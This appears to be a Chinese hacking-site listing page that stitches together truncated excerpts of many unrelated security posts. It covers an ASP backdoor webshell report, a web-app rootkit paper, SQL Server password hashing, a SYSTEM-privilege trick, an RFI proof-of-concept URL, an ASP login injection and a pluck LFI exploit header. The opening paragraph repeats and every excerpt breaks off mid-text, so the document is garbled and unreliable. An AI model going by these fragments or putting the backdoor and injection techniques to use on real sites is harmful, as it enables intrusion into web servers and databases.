这一个文章和我以前发布的一个文章正好成了一个对比(文章连接),如果上一次是茅。那么此次这个就是盾了.为什么这样说?请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。
例图:
这一个文章和我以前发布的一个文章正好成了一个对比(文章连接),如果上一次是茅。那么此次这个就是盾了.为什么这样说?请看一下上一篇的文章。因为上一次是直接修改数据库的防下载表而不会造成数据沉淀在数据库里面。那么换一个思想来讲。假设在数据库当中并没有这一个防下载表。但是却有防下载功能。
例图:
先要在此感谢evil的提醒,昨天(2009-3-11)时上网后。发现网上有很多新版本的SHELL发布。而且还声称是终结版(我自己都没把自己终结。倒被你终结了).而且采用了加密手段。。现在我将下载回来程序。。打开并分析一下。现在把报告给大家。请慎重使用。。。。
心动吧asp在线-不加密加强版-是市面上目前功能最强的.速度最好的一款asp后门
此内部版修正了:关于无端口的sql连接出错.通用三种SQL连接方式
Author: jianxin [80sec]
EMail: jianxin#80sec.com
Site: http://www.80sec.com
Date: 2009-3-28
From: http://www.80sec.com/release/webapp-rootkit.txt
[ 目录 ]
0×00 为什么我们会有这个想法
0×01 web应用程序中后门的基本思想
0×02 实际应用中的一些例子
.....
SQL服务器是怎样储存密码的?
SQL服务器使用了一个没有公开的函数pwdencrypt()对用户密码产生一个hash。通过研究我们可以发
现这个hash储存在mater数据库的sysxlogins表里面。这个可能已经是众所周知的事情了。
pwdencrypt()函数还没有公布详细的资料,我们这份文档将详
...
明生注:这是一款很受欢迎的商城网,很多大型网站都用这一套商业程序。。。
演示地址: http://ecmall.discuz.net/
respond.php 48行
$pay_code = !empty($_REQUEST['code']) ? trim($_REQUEST['code']) : '';
...
大家知道,SYSTEM是至高无上的超级管理员帐户。默认情况下,我们无法直接在登录对话框上以SYSTEM帐户的身份登录到Windows桌面环境。实际上SYSTEM帐户早就已经“盘踞”在系统中了。想想也是,连负责用户验证的Winlogon、Lsass等进程都是以SYSTEM身份运行的,谁还能有资格检验SYSTEM呢?既然SYSTEM帐户早就已经出现在系统中,所以只需以SYSTEM帐户的身份启动Windows的Shell程序Explorer,就相当于用SYSTEM身份登录Windows了。
一、获得特权
1、执行“开始→运行”输入cmd回车打开命令提示符窗口。
2、在命令提示符下输入如下命令并回车:
taskkill /f /im explorer.exe
....
Acute Control Panel 1.0.0 SQL注入
远程文件共享:
漏洞页面:container.php
<?php include_once($theme_directory."/sidebar.php"); ?>
利用:
http://127.0.0.1/themes/container.php?theme_directory=[Shell]
漏洞页面:
From: Sowhat
Metasploit更新了,0day,顶。
这个漏洞一般的web fuzzer应该都能找到吧
http://trac.metasploit.com/browser/framework3/trunk/modules/exploits/windows/http/bea_weblogic_jsessionid.rb?rev=6406
作者:心动吧明生KISS
这是关于一个国外远程控制的日志..首先先看一下什么是Remotelyanywhere("以下简称:Rtyy")和pcAnywhere差不多..
Rtyy是一个小巧的,利用浏览器进行远程控制的小程序。把它安装在NT计算机上。然后你就可以通过任何浏览器对远程计算机进行控制了。通过它,你可以管理远程计算机上的各种服务、进程、用户和
...
如下:
1.可以下载数据库。
2.注入:
后台的登陆文件
见Login.asp(登陆的判断处理)
代码如下:
admin_name=trim(request.Form("admin_name"))
admin_password=trim(request.Form("admin_password"))
admin_password=md5(admin_password)
....
<?php
/*
pluck v 4.6.1 LFI exploit
autor : Alfons Luja
Vuln is in \data\modules\blog\module_pages_site.php
...
$includepage = 'blog_include.php';
//Only set 'view post'-page if a post has been specified
if (isset($_GET['post'])) {
//Check if post exists, and include information
if (file_exists('data/settings/modules/blog/posts/'.$_GET['post'])) {
include('data/settings/modules/blog/posts/'.$_GET['post']);
$module
....
if (empty($_GET['type']))
{
...
}
elseif ($_GET['type'] == 'collection')
{
...
...